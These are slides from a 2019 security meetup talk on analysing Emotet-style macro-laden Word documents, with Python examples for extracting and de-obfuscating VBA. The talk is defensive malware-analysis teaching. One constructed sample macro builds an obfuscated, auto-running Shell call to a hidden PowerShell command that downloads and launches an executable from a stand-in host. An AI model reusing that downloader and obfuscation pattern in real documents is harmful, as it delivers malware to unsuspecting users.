MALICIOUS WORD DOC ANALYSIS
Silicon Valley Cyber Security Meetup
October 2019
EMOTET
▸ Attackers are actively using Word documents with obfuscated macros
▸ The macro runs a PowerShell script that downloads the main executable
HOW MACROS ARE STORED?
▸ MS Office 97-2003 documents (.doc)
▸ Microsoft Compound File Binary (CFB) a.k.a OLE (Object Linking and Embedding)
▸ Like a filesystem: storages act as directories, streams as files
▸ The VBA storage contains the macro source code in compressed form (MS-OVBA compression), so the streams must be decompressed before the source can be read
https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-doc/ccd7b486-7881-484c-a137-51170af7cc22
HOW MACROS ARE STORED?
▸ MS Office 2007+ documents (.docx / .docm)
▸ Office Open XML format: XML files in a ZIP archive
▸ Macros are stored in a binary OLE file inside the ZIP archive called "vbaProject.bin" (word/vbaProject.bin in a Word document), i.e. the same CFB format as above, just wrapped in a ZIP
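The two storage layouts above in working code, as an added example that is not code from the slides or from oletools/oledump: it tells the two container types apart by magic bytes, pulls vbaProject.bin out of an OpenXML ZIP, and implements the MS-OVBA decompression (spec section 2.4.1) that turns the compressed VBA source back into text. The .docm package and the compressed buffer are constructed for the demo; the stub vbaProject.bin carries only the OLE magic and is not a full OLE container, and all function names are the example's own.

```python
"""Locate and decompress VBA macro source (added example, constructed inputs)."""
import io
import struct
import zipfile

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # CFB/OLE header signature
ZIP_MAGIC = b"PK\x03\x04"                          # local file header of a ZIP


def container_type(blob):
    """'ole' for 97-2003 binary documents, 'openxml' for 2007+ ZIP packages."""
    if blob.startswith(OLE_MAGIC):
        return "ole"
    if blob.startswith(ZIP_MAGIC):
        return "openxml"
    return "unknown"


def find_vba_project(docm_bytes):
    """Return the embedded vbaProject.bin (itself an OLE file) from an OpenXML
    package, or None when the document carries no macros."""
    with zipfile.ZipFile(io.BytesIO(docm_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith("vbaproject.bin"):   # word/, xl/ or ppt/ prefix
                return zf.read(name)
    return None


def decompress_vba(data):
    """Decompress an MS-OVBA CompressedContainer: signature byte 0x01 followed by
    chunks of up to 4096 decompressed bytes made of literal/copy tokens."""
    if not data or data[0] != 0x01:
        raise ValueError("missing MS-OVBA signature byte 0x01")
    out = bytearray()
    pos = 1
    while pos < len(data):
        header = struct.unpack_from("<H", data, pos)[0]
        if (header >> 12) & 0x7 != 0b011:
            raise ValueError("bad chunk signature at offset %d" % pos)
        chunk_end = pos + (header & 0x0FFF) + 3      # field stores chunk size - 3
        compressed = bool(header & 0x8000)
        pos += 2
        chunk_start = len(out)
        if not compressed:                           # raw 4096-byte chunk
            out += data[pos:chunk_end]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags = data[pos]                        # one flag bit per following token
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:           # literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                token = struct.unpack_from("<H", data, pos)[0]
                pos += 2
                # The 16-bit copy token is split into offset and length; the offset
                # gets max(ceil(log2(bytes already decompressed in chunk)), 4) bits.
                diff = len(out) - chunk_start
                if diff == 0:
                    raise ValueError("copy token at start of chunk")
                offset_bits = max((diff - 1).bit_length(), 4)
                length = (token & (0xFFFF >> offset_bits)) + 3
                offset = (token >> (16 - offset_bits)) + 1
                for _ in range(length):              # overlapping copy, byte by byte
                    out.append(out[-offset])
    return bytes(out)


# Constructed container: 0x01, header 0xB005 (compressed chunk, total size 8),
# flag byte 0x08, literals "ABC", then copy token 0x2006 (offset 3, length 9).
SAMPLE_COMPRESSED = b"\x01\x05\xB0\x08ABC\x06\x20"


def build_fake_docm():
    """Minimal OpenXML-like ZIP with a stub vbaProject.bin (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 504)
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_fake_docm()
    print(container_type(doc), container_type(find_vba_project(doc)))
    print(decompress_vba(SAMPLE_COMPRESSED).decode())
```

In a real vbaProject.bin the compressed buffer sits inside each module stream at the text offset recorded in the VBA/dir stream (which is compressed the same way), so you still need an OLE directory walker to reach it; that is exactly what `olevba` does for you, and what `oledump.py -s <stream> -v` does for a single stream.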
EXTRACT MACROS FROM WORD DOCS
▸ oledump: https://blog.didierstevens.com/programs/oledump-py/
python oledump.py DOC_NAME
▸ oletools: https://github.com/decalage2/oletools
sudo -H pip install -U oletools
▸ oleid: analyzes OLE files to detect specific characteristics usually found in malicious files.
▸ olevba: extracts and analyzes VBA macro source code from MS Office documents (OLE and OpenXML).
▸ olebrowse: a simple GUI to browse OLE files (e.g. MS Word, Excel, PowerPoint documents), to view and extract individual data streams.
▸ olemeta: extracts all standard properties (metadata) from OLE files.
▸ oletimes: extracts creation and modification timestamps of all streams and storages.
▸ oledir: displays all the directory entries of an OLE file, including free and orphaned entries.
▸ olemap: displays a map of all the sectors in an OLE file.
EXTRACT CMD / POWERSHELL FROM VBA SCRIPT
▸ There is going to be a lot of
  ▸ Unused benign code
  ▸ Junk code
  ▸ Obfuscation
  ▸ String replacements
▸ The PowerShell code will be the downloader
▸ Download URLs will be obfuscated (split strings, Chr() calls, Replace() with junk markers, reversed or base64-encoded commands)
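What the manual work on that slide looks like when scripted, as an added example that is not code from the slides: a small evaluator for the string-building subset Emotet-style macros lean on (string literals, Chr()/ChrW() with an integer argument, the & and + concatenation operators, Replace(), StrReverse() and previously assigned variables), which then takes the command handed to Shell or WScript.Shell.Run, decodes a PowerShell -EncodedCommand payload (base64 of UTF-16LE) and lists the URLs inside it. The macro, the payload and the URL (example.invalid is a reserved TLD) are constructed for the demo, and the function names are the example's own.

```python
"""Recover the PowerShell downloader from an obfuscated VBA macro (added example)."""
import base64
import re

TOKEN_RE = re.compile(r'"(?:[^"]|"")*"|[A-Za-z_]\w*|\d+|[&+(),]')
ASSIGN_RE = re.compile(r"^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$")
EXEC_RE = re.compile(r"(?:\bShell\b|\.Run\b)\s*\(?\s*(.+)$", re.I)
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+")


def _term(tokens, i, env):
    """Evaluate one operand starting at tokens[i]; return (value, next index)."""
    tok = tokens[i]
    if tok.startswith('"'):                        # VBA literal; "" is an escaped quote
        return tok[1:-1].replace('""', '"'), i + 1
    if tok == "(":                                 # parenthesised sub-expression
        value, i = _expr(tokens, i + 1, env)
        return value, i + 1                        # skip ')'
    name = tok.lower()
    if name in ("chr", "chrw"):                    # Chr(NN) with a plain integer argument
        return chr(int(tokens[i + 2])), i + 4
    if name == "strreverse":
        value, i = _expr(tokens, i + 2, env)
        return value[::-1], i + 1
    if name == "replace":                          # Replace(text, old, new)
        text, i = _expr(tokens, i + 2, env)
        old, i = _expr(tokens, i + 1, env)
        new, i = _expr(tokens, i + 1, env)
        return text.replace(old, new), i + 1
    return env.get(name, tok), i + 1               # variable lookup, else the bare token


def _expr(tokens, i, env):
    """term (& term)*; stops at ',' or ')' so call arguments are split correctly."""
    value, i = _term(tokens, i, env)
    while i < len(tokens) and tokens[i] in ("&", "+"):
        rhs, i = _term(tokens, i + 1, env)
        value += rhs
    return value, i


def _eval(source, env):
    tokens = TOKEN_RE.findall(source)
    return _expr(tokens, 0, env)[0] if tokens else ""


def evaluate_vba(text):
    """Walk the macro top to bottom, resolving assignments as the interpreter would.
    Returns (variables, resolved command strings passed to Shell / .Run)."""
    env, commands = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("'"):       # skip blanks and comments
            continue
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1).lower()] = _eval(m.group(2), env)
            continue
        m = EXEC_RE.search(line)
        if m:
            commands.append(_eval(m.group(1), env))
    return env, commands


def decode_powershell(command):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or the
    command unchanged when it is not encoded."""
    m = ENC_RE.search(command)
    if not m:
        return command
    return base64.b64decode(m.group(1)).decode("utf-16le")


def extract_urls(macro_source):
    """End to end: resolve strings, decode the PowerShell, list download URLs."""
    _, commands = evaluate_vba(macro_source)
    urls = []
    for cmd in commands:
        urls.extend(URL_RE.findall(decode_powershell(cmd)))
    return urls


# --- constructed sample -----------------------------------------------------
PAYLOAD_URL = "http://example.invalid/doc/upd.exe"         # constructed, reserved TLD
PS_SCRIPT = ("$w = New-Object Net.WebClient; "
             "$w.DownloadFile('%s', $env:TEMP + '\\upd.exe'); "
             "Start-Process ($env:TEMP + '\\upd.exe')" % PAYLOAD_URL)
ENCODED = base64.b64encode(PS_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed macro following the pattern the slide describes: junk code, a
# command split by Replace() markers, Chr() building and a reversed string.
SAMPLE_MACRO = '''
Sub AutoOpen()
    ' constructed sample, not a real Emotet document
    Dim qfx As String, bzr As String, oqp As String, junk As Integer
    junk = 1337
    qfx = Replace("po##wersh##ell -w hid##den -e##nc ", "##", "")
    bzr = "%s"
    oqp = StrReverse("c/ " & Chr(100) & Chr(109) & Chr(99))
    Shell oqp & " " & qfx & bzr, 0
End Sub
''' % ENCODED

if __name__ == "__main__":
    print(evaluate_vba(SAMPLE_MACRO)[1][0][:60] + "...")
    print(extract_urls(SAMPLE_MACRO))
```

Real samples add tricks this evaluator does not cover (arithmetic inside Chr(), Mid()/Left() slicing, document properties or form fields used as string sources), which is why the next step on the slides is a debugger; `olevba --deobf --decode` is the automated version of the same idea.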
LIVE DEMO
USING A DEBUGGER
▸ Microsoft Visual Basic for Applications Editor: set a breakpoint in the macro and step through it, letting Word resolve the obfuscated strings itself (inspect them in the Locals or Immediate window)
▸ Only do this in an isolated analysis VM: stepping over the Shell call runs the downloader
LIVE DEMO
ANY QUESTIONS?